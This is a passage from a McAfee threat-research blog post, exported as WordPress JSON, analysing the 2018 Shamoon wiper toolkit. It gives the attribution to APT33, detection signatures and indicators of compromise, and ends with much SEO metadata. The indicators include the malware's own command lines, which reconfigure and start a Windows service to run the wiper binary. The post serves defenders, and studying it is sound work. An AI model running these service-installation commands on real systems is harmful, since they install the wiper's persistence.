670w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25-300x65.png 300w\" sizes=\"auto, (max-width: 670px) 100vw, 670px\" \/><\/a><\/p>\n<p>The function ProcessTracker has been coded to track the destruction.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93306\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png\" alt=\"\" width=\"365\" height=\"215\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png 365w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26-300x177.png 300w\" sizes=\"auto, (max-width: 365px) 100vw, 365px\" \/><\/a><\/p>\n<h2>Conclusion<\/h2>\n<p>In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the \u201ctool kit\u201d approach, the attackers can spread the wiper module through the victims\u2019 networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.<\/p>\n<p>Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. 
Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.<\/p>\n<p>When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its <a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/09\/apt33-insights-into-iranian-cyber-espionage.html\">report<\/a>), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Coverage<\/strong><\/h2>\n<p>The files we detected during this incident are covered by the following signatures:<\/p>\n<ul>\n<li>Trojan-Wiper<\/li>\n<li>RDN\/Generic.dx<\/li>\n<li>RDN\/Ransom<\/li>\n<\/ul>\n<h2><strong>Indicators of compromise<\/strong><\/h2>\n<p><strong>Hashes<\/strong><\/p>\n<ul>\n<li>OCLC.exe: f972d776d7dabf9f978dc4cc4f69d88e715541ff<\/li>\n<li>Spreader.exe: 0104e42d1d6522f6170ca4aa42fcbf70f7390a74<\/li>\n<li>SpreaderPsexec.exe: cb8faa97e94c3c60b680e28eb6a2d3910d1ce466<\/li>\n<li>Slhost.exe: 3eab7112e94f9ec1e07b9ae4696052a7cf123bba<\/li>\n<\/ul>\n<p><strong>File paths and filenames<\/strong><\/p>\n<ul>\n<li>C:\\net2\\<\/li>\n<li>C:\\all\\<\/li>\n<li>C:\\net4\\<\/li>\n<li>C:\\windows\\system32\\<\/li>\n<li>C:\\\\Windows\\System32\\Program Files\\Internet Explorer\\Signing<\/li>\n<li>\\\\admin$\\process.bat<\/li>\n<li>NothingFound.txt<\/li>\n<li>MaintenaceSrv32.exe<\/li>\n<li>MaintenaceSrv64.exe<\/li>\n<li>SlHost.exe<\/li>\n<li>OCLC.exe<\/li>\n<li>Spreader.exe<\/li>\n<li>SpreaderPsexec.exe<\/li>\n<\/ul>\n<p><strong>Some command lines<\/strong><\/p>\n<ul>\n<li>cmd.exe \/c &#8220;&#8221;C:\\Program Files\\Internet Explorer\\signin\\MaintenaceSrv32.bat<\/li>\n<li>cmd.exe \/c &#8220;ping -n 30 127.0.0.1 &gt;nul &amp;&amp; sc config MaintenaceSrv binpath= C:\\windows\\system32\\MaintenaceSrv64.exe LocalService&#8221; &amp;&amp; ping -n 10 127.0.0.1 &gt;nul &amp;&amp; sc start 
MaintenaceSrv<\/li>\n<li>MaintenaceSrv32.exe LocalService<\/li>\n<li>cmd.exe \/c &#8220;&#8221;C:\\Program Files\\Internet Explorer\\signin\\MaintenaceSrv32.bat &#8221; &#8220;<\/li>\n<li>MaintenaceSrv32.exe service<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks&#8230;<\/p>\n","protected":false},"author":839,"featured_media":93315,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1411,5526,338,180,4185],"coauthors":[4688,5349,3576],"class_list":["post-93278","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-advanced-persistent-threats","tag-advanced-threat-research","tag-endpoint-protection","tag-malware","tag-phishing"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck 
several companies in\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-12-19T21:45:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-20T06:05:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2048\" \/>\n\t<meta property=\"og:image:height\" content=\"1365\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fr0gger_\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"},\"author\":{\"name\":\"Thomas Roccia\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7\"},\"headline\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems\",\"datePublished\":\"2018-12-19T21:45:13+00:00\",\"dateModified\":\"2024-02-20T06:05:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"},\"wordCount\":1579,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"keywords\":[\"advanced persistent threats\",\"Advanced Threat Research\",\"endpoint protection\",\"malware\",\"Phishing\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\",\"name\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee 
Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"datePublished\":\"2018-12-19T21:45:13+00:00\",\"dateModified\":\"2024-02-20T06:05:55+00:00\",\"description\":\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"width\":2048,\"height\":1365},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcaf
ee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7\",\"name\":\"Thomas 
Roccia\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/219099eb1ee40018f72bf1e381c6bd75\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png\",\"caption\":\"Thomas Roccia\"},\"description\":\"Thomas Roccia is senior security researcher on the Advanced Threat Research team. He works on threat intelligence, tracking cybercrime campaigns and collaborating with law enforcement agencies. In a previous role, Thomas worked on the McAfee Foundstone team, performing worldwide incident response, malware hunting, and penetration testing. He has helped customers during major outbreaks and managed highly critical situations. Thomas has developed workshops, training courses, presentations, he leads the Unprotect Project, an open-source database dedicated to malware evasion techniques. His work in security research includes threat intelligence, malware, reverse engineering, vulnerabilities as well as innovation and patenting. He speaks regularly at security conferences.\",\"sameAs\":[\"http:\/\/troccia.tdgt.org\",\"https:\/\/www.linkedin.com\/in\/thomas-roccia\/\",\"https:\/\/x.com\/fr0gger_\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/thomas-roccia\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog","description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog","og_description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2018-12-19T21:45:13+00:00","article_modified_time":"2024-02-20T06:05:55+00:00","og_image":[{"width":2048,"height":1365,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","type":"image\/jpeg"}],"author":"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek","twitter_card":"summary_large_image","twitter_creator":"@fr0gger_","twitter_site":"@McAfee","twitter_misc":{"Written by":"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek","Est. 
reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"},"author":{"name":"Thomas Roccia","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7"},"headline":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems","datePublished":"2018-12-19T21:45:13+00:00","dateModified":"2024-02-20T06:05:55+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"},"wordCount":1579,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","keywords":["advanced persistent threats","Advanced Threat Research","endpoint protection","malware","Phishing"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","name":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee 
Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","datePublished":"2018-12-19T21:45:13+00:00","dateModified":"2024-02-20T06:05:55+00:00","description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","width":2048,"height":1365},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other 
Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7","name":"Thomas 
Roccia","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/219099eb1ee40018f72bf1e381c6bd75","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png","caption":"Thomas Roccia"},"description":"Thomas Roccia is senior security researcher on the Advanced Threat Research team. He works on threat intelligence, tracking cybercrime campaigns and collaborating with law enforcement agencies. In a previous role, Thomas worked on the McAfee Foundstone team, performing worldwide incident response, malware hunting, and penetration testing. He has helped customers during major outbreaks and managed highly critical situations. Thomas has developed workshops, training courses, presentations, he leads the Unprotect Project, an open-source database dedicated to malware evasion techniques. His work in security research includes threat intelligence, malware, reverse engineering, vulnerabilities as well as innovation and patenting. 
He speaks regularly at security conferences.","sameAs":["http:\/\/troccia.tdgt.org","https:\/\/www.linkedin.com\/in\/thomas-roccia\/","https:\/\/x.com\/fr0gger_"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/thomas-roccia\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/839"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=93278"}],"version-history":[{"count":1,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278\/revisions"}],"predecessor-version":[{"id":183172,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278\/revisions\/183172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/93315"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=93278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=93278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=93278"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=93278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}